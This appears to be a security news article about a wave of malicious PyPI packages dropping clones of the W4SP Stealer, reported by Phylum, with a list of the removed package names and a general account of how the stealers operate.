The PyPi python package repository is being bombarded by a wave of information-stealing malware hiding inside malicious packages uploaded to the platform to steal software developers’ data.
The malware dropped in this campaign is a clone of the open-source W4SP Stealer, responsible for a previous widespread malware infection on PyPI in November 2022.
Since then, an additional 31 packages dropping ‘W4SP’ have been removed from the PyPI repository, with the malware’s operators continuing to seek new ways to reintroduce their malware on the platform.
Targeting open-source developers
Last week, the Phylum research team reported it had found another set of 47 packages that distributed W4SP on PyPI. However, this operation was disrupted after GitHub terminated the repository used by the threat actor for fetching the primary payload.
The cybersecurity firm reported yesterday that at least 16 packages on PyPI are spreading ten different information-stealing malware variants based on W4SP Stealer.
The malicious packages that contain these information stealers are:
modulesecurity – 114 downloads
informmodule – 110 downloads
chazz – 118 downloads
randomtime – 118 downloads
proxygeneratorbil – 91 downloads
easycordey – 122 downloads
easycordeyy – 103 downloads
tomproxies – 150 downloads
sys-ej – 186 downloads
py4sync – 453 downloads
infosys – 191 downloads
sysuptoer – 186 downloads
nowsys – 202 downloads
upamonkws – 205 downloads
captchaboy – 123 downloads
proxybooster – 69 downloads
While these packages drop stealers that use different names, like Celestial Stealer, ANGEL stealer, Satan Stealer, @skid Stealer, and Leaf $tealer, Phylum has found that they are all based on the W4SP code.
“Each deployment appears to have simply tried to do a find/replace of the W4SP references in exchange for some other seemingly arbitrary name. In some cases, not all references were removed and trace strings of “W4SP” remain.” – Phylum.
With one exception, “chazz,” the new stealers do not follow W4SP’s complex attack chain that features multiple stages and code obfuscation.
Instead, they drop the stealer’s code directly into the “main.py” or the “_init_.py” files with no encoding, so a basic code review immediately reveals their nature.
The “chazz” package, which drops a copy of the “Leaf $tealer,” is the only one of the new batch that features some obfuscation via the BlankOBF tool, but it’s still reasonably easy to deobfuscat
Following the same tactics as with the W4SP operation, the new stealers use GitHub repositories as a remote resource for downloading the malware payload.
It is unclear whether these malware “clones” are operated by the same threat actors behind W4SP or its copycats, but Phylum hypothesizes it’s from different groups that attempt to mimic previous campaigns.
All the packages presented in this report have been removed from the PyPI repository, but not before they were downloaded over 2,500 times.
Hackers have been increasingly targeting open-source package repositories as compromising developer’s systems offers an opportunity for even larger attacks.
As developers commonly store authorization tokens and API keys in their applications, stealing these secrets could allow threat actors to conduct more widespread supply chain attacks or steal data for use in extortion demands.
As long as the infection numbers make an effort worthwhile, we will continue to see threat actors uploading malicious packages on open-source repositories under different names and accounts.